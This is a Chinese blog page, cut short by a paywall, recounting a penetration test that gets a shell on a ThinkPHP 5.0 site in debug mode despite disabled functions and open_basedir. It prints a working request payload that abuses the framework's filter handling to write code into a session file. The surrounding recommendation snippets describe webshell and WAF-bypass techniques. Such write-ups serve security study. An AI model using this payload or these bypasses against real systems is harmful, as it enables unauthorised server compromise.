thinkphp自定义url_渗透记实|ThinkPhp绕过限制GetShell

最新推荐文章于 2022-03-19 08:54:57 发布
原创 最新推荐文章于 2022-03-19 08:54:57 发布 · 1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#thinkphp自定义url

本文详细介绍了在ThinkPHP V5.0.*框架中,如何在开启debug模式下绕过限制获取Shell。文章探讨了命令执行被限制、open_basedir限制等问题,并提供了不同师傅的解决办法。通过深入分析Request.php的filterValue函数、App.php的Run方法,以及Route.php的parseUrl函数,揭示了如何构造payload来绕过disable_functions中的限制,最后成功执行命令。

0x01 前言

项目里遇到一个站,用的是ThinkPHP V5.0.*框架,且开启了debug模式,本以为一发payload的就能解决的事情,没想到拿下的过程还得小绕一下...

0x02 踩坑

  1. 尝试命令执行,system被限制了

a31c9989917a0ee3cd0012e624c0e4b7.png

  1. 尝试包含日志文件,open_basedir限制了

131cda19b32bb7211bc871972ecdcabe.png

  1. 这里有个思路,可以去包含runtime下的日志文件,但是thinkphp的日志文件比较大,而且有时候会有很多奇怪的问题阻断代码执行,暂且作为备选方案

c950dda369088c0a266f46dae0b35f69.png

  1. 尝试通过thinkphp本身Library中设置Session的方法把脚本写入tmp目录里的Session文件,然后进行包含

_method=__construct&filter[]=think\Session::set&method=get&server[REQUEST_METHOD]= phpinfo();?>

但是。。。

1ae1253180a0b6e147d4a7fbf441f998.png

0x03 GetShell

俗话说,三个臭皮匠顶一个诸葛亮,求助师傅们后,给出了解决的办法

  1. Noel 师傅和HTF师傅的解决方法及分析:

c6d56a1af41535a8fbbc08c1fba7ee18.png

Request.php的filtervalue函数下存在call_user_func,根据Payload,跟踪下流程

首先会进入App.php的Run方法

public static function run(Request $request = null){        ………………………………
        // 未设置调度信息则进行 URL 路由检测
        if (empty($dispatch)) {            /*执行当前类的routeCheck方法,获取调度信息,如访问index模块下index控制器里的index方法,则
                $dispatch = arr
最低0.47元/天 解锁文章
一次项目中Thinkphp绕过禁用函数的实战记录
菜鸟教程
03-23 1642
更多python教程请到友情连接: 菜鸟教程https://www.piaodoo.com 茂名一技http://www.enechn.comppt制作教程步骤 http://www.tpyjn.cn 兴化论坛http://www.yimoge.cn 电白论坛 http://www.fcdzs.com 目录前言file_put_contents pcntl_exec LD_PRELOAD 劫持 总结前言 在一次渗透测试中,手工找了许久没发现什么东西,抱着尝试的心情打开了xray 果然xray还是挺给力
thinkphpURL路由规则与配置实例
10-25
主要介绍了thinkphpURL路由规则与配置方法,实例分析了ThinkPHP的路由规则及伪静态设置方法,并分析了相关的注意事项,是ThinkPHP开发中非常重要的技巧,需要的朋友可以参考下
Thinkphp绕过宝塔getshell
热门推荐
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
03-07 1万+
可以看到直接被拦了,经测试这里是敏感函数字符拦截,大部分有用的敏感函数都被拦了,这里面被拦的是phpinfo() Emmmm,怎么办呢。。。。。 直接执行代码不行,那么就写入代码吧,用file_put_contents()函数进行写入。 但这里又有一个问题,正常的写入由于请求参数中带有敏感字符一样会被拦,并且使用小马执行调用敏感函数的时候也会被拦 所以得配合点黑科技,使用特殊......
ThinkPHP URL设置
HYQ_java的博客
07-24 583
URL大小写 'URL_CASE_INSENSITIVE'=>true, //设置url区分不大小写,正常是正常成true。目前没有效果,不知道是不是mac版本的问题 如果控制器的名称为UserGroupController,url访问可以写成user_group,用下划线代替代大小写 伪静态 URL伪静态通常是为了满足更好的SEO效果,ThinkPHP支持伪静态URL设置,可以通...
ThinkPHP内置函数----U方法
weixin_33885676的博客
07-14 286
2019独角兽企业重金招聘Python工程师标准>>> ...
精选资源
ThinkPHP_getshell-v2.zip
11-11
标题“ThinkPHP_getshell-v2.zip”提示我们关注的是与ThinkPHP框架相关的安全问题,特别是一个可能导致getshell的漏洞。Getshell通常指的是攻击者能够通过某种方式在目标服务器上执行命令,这通常与代码注入漏洞相关...
ThinkPHP_v5.0.7.zip_ThinkPHP V5.0.7_thinkphp
09-23
《深入理解ThinkPHP V5.0.7框架》 ThinkPHP,作为一个广受开发者欢迎的开源PHP框架,其V5.0.7版本是其发展过程中一个重要里程碑。这个版本不仅继承了ThinkPHP一贯的轻量级和面向对象设计原则,还引入了诸多新特性和...
ThinkPHP-2.0-API.rar_API THINKPHP_thinkphp_thinkphp A_thinkphp
09-23
《深入理解ThinkPHP 2.0 API:框架详解与实践指南》 ThinkPHP 2.0 是中国本土开发的一款开源的PHP轻量级框架,它以其简洁、高效的特性深受开发者喜爱。本篇将针对ThinkPHP 2.0的API进行详尽解析,帮助读者深入理解...
thinkphp中__PUBLIC__常量的用法.zip
01-08
2. **模板字符串替换**:在ThinkPHP中,可以通过配置文件设置`TMPL_PARSE_STRING`来实现模板字符串的自定义解析。例如,你可以定义一个新的常量`__STATIC__`来代表静态资源目录,这样可以避免在代码中硬编码路径,...
ThinkPHP核心版本.zip_ThinkPHP核心版本_thinkphp_thinkphp schema_部署
09-20
这个名为"ThinkPHP核心版本.zip_ThinkPHP核心版本_thinkphp_thinkphp_schema_部署"的压缩包显然包含了ThinkPHP框架的核心组件,以及与数据库模式(schema)和部署相关的资源。 1. **ThinkPHP核心版本**:ThinkPHP...
php绕过宝塔,Thinkphp绕过宝塔getshell
weixin_39843677的博客
03-27 1552
可以看到直接被拦了,经测试这里是敏感函数字符拦截,大部分有用的敏感函数都被拦了,这里面被拦的是phpinfo() Emmmm,怎么办呢。。。。。直接执行代码不行,那么就写入代码吧,用file_put_contents()函数进行写入。但这里又有一个问题,正常的写入由于请求参数中带有敏感字符一样会被拦,并且使用小马执行调用敏感函数的时候也会被拦 所以得配合点黑科技,使用特殊小马,加URL编码三次 u...
ThinkPHP(3)——URL模式
君君的专栏
05-30 1394
什么是URL模式?thinkhp是单入口框架,所有的请求都要通过入口文件,那么如何通过解析访问地址来调用对应的控制器中的方法呢?我们常见的url可能有多种形式: http://localhost/index.php?m=index&a=index http://localhost/index.php/Index/user 显然第二种会比第一种美观一些。因此,thinkphp提供了四种URL模式,能够
ThinkPHP 5.x 远程命令执行漏洞复现(GetShell
北风
12-12 1万+
注:转载请注明出自:https://blog.csdn.net/qq_36711453/article/details/84977739 一、简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.05.1...
ThinkPHP 解析访问路径的坑
weixin_30652879的博客
08-26 327
首先我得检讨:因为我的懒惰以及命名的不规范,踩到这个坑。 对于特殊需求你得单独想一个独特的命名而不能乱起名字。 使用 AJAX 以 POST 方式提交参数 a : "10001" b : "10013" 到 http://localhost/market/index.php/home/resource/searchGroup 报错非法操作 ...
ThinkPHP6.0 入门【二】,url访问模式,控制器定义,基础、空、多级,验证
weixin_42588479的博客
03-19 2930
学习目标 url解析 url兼容模式 控制器定义 渲染输出 基础控制器 空控制器 多级控制器 一.url解析 thinkPHP框架的许多操作都是通过url来实现的
php 自定义 url,自定义url变量转义方法
weixin_35044945的博客
03-11 388
自定义url变量转义方法thinkphp等系统专用,url传递的参数不能带有/等特殊字符function base_encode($str) {$src = array("/","+","=","?","&");$dist = array("_.a._","_.b._","_.c._","_.d._","_.e._");$new = str_replace($src,$dist,$st...
php简化URL路径,thinkphp框架实现路由重定义简化url访问地址的方法分析
weixin_42514002的博客
03-17 251
本文实例讲述了thinkphp框架实现路由重定义简化url访问地址的方法。分享给大家供大家参考,具体如下:如果按照正常访问的话,则需要输入一长串的url地址,这样会显得十分冗长,我可以可以通过对路由规则的重新定义简化url访问地址。namespace app\index\controller;class Index{public function index(){return '我是index';...
掌握ThinkPHP v5.x命令执行及GetShell工具使用
最后,关于文件名称“ThinkPHP_getshell.exe”,这是一个可执行文件,很可能包含了用于执行远程命令的恶意代码。绝不能在生产环境或未经授权的情况下运行此类工具,因为这不仅可能导致严重的安全问题,还可能违反...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值